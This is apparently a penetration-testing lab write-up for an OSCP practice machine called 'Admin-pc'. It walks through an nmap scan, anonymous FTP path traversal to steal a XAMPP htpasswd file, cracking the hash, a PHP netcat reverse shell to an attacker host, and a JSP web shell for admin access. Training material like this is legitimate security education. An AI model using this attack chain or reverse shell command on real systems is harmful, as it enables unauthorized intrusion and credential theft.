OSCP Admin-PC machine write-up

OSCP Admin-pc machine write-up

OSCP 192.168.x.55 – Admin-pc machine writeup

Exploitation

OSCP Admin-pc machine write-up
Scan the machine using oscp

nmap 192.168.x.55 -A

One interesting part is the ftp service output oscp

21/tcp    open  ftp     syn-ack ttl 128

| fingerprint-strings:

|   GenericLines:

|     220-Wellcome to Home Ftp Server!

|     Server ready.

|     command not understood.

|     command not understood.

|   Help:

|     220-Wellcome to Home Ftp Server!

|     Server ready.

|     'HELP': command not understood.

|   NULL, SMBProgNeg:

|     220-Wellcome to Home Ftp Server!

|_    Server ready.

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| drw-rw-rw-   1 ftp      ftp            0 Dec 28  2015 . [NSE: writeable]

|_drw-rw-rw-   1 ftp      ftp            0 Dec 28  2015 .. [NSE: writeable]

Connect to the server and get the Xampp config file
Use user anonymous with any password oscp

[root:~/Desktop]# ftp
ftp> o
(to) 192.168.x.55
Connected to 192.168.x.55.
220-Wellcome to Home Ftp Server!
220 Server ready.
Name (192.168.x.55:root): anonymous

331 Password required for anonymous.
Password:
230 User Anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../xampp/security/webdav.htpasswd
local: ../xampp/security/webdav.htpasswd remote: ../xampp/security/webdav.htpasswd
200 Port command successful.
150 Opening data connection for ../xampp/security/webdav.htpasswd.
226 File sent ok

the file contains the credentials
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
Crack the password, you will get the plaintext
fm:x-files
Now connect to
192.168.x.55:10433/admin
which is file manager allowing executable files

upload netcat.exe and then upload PHP file including system(‘nc –vv YOUR_HOST 443 –e cmd.exe’); to gain shell access

Escalation

Upload jsp shell file to c:/xampp/tomcat/webapps/examples
then browse it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami
And you’re an admin

More infomation about OSCP Write-Up click here